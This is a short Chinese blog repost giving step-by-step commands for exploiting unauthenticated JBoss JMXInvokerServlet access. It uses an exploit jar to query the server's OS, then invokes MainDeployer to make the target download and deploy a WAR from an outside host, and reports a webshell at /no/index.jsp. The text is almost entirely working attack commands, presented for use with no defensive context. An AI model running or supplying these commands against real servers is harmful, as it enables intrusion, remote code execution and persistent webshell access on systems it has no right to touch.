Jboss未授权访问部署木马 利用exp
生活随笔
收集整理的這篇文章主要介紹了
Jboss未授权访问部署木马 利用exp
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName
java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion
3.遠(yuǎn)程部署war
java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war
獲得shell地址:
www.any.com:8080/no/index.jsp
成功!
轉(zhuǎn)載于:https://www.cnblogs.com/n00p/p/8951922.html
總結(jié)
以上是生活随笔為你收集整理的Jboss未授权访问部署木马 利用exp的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 3.使用Selenium模拟浏览器抓取淘
- 下一篇: 虚拟环境安装Scrapy框架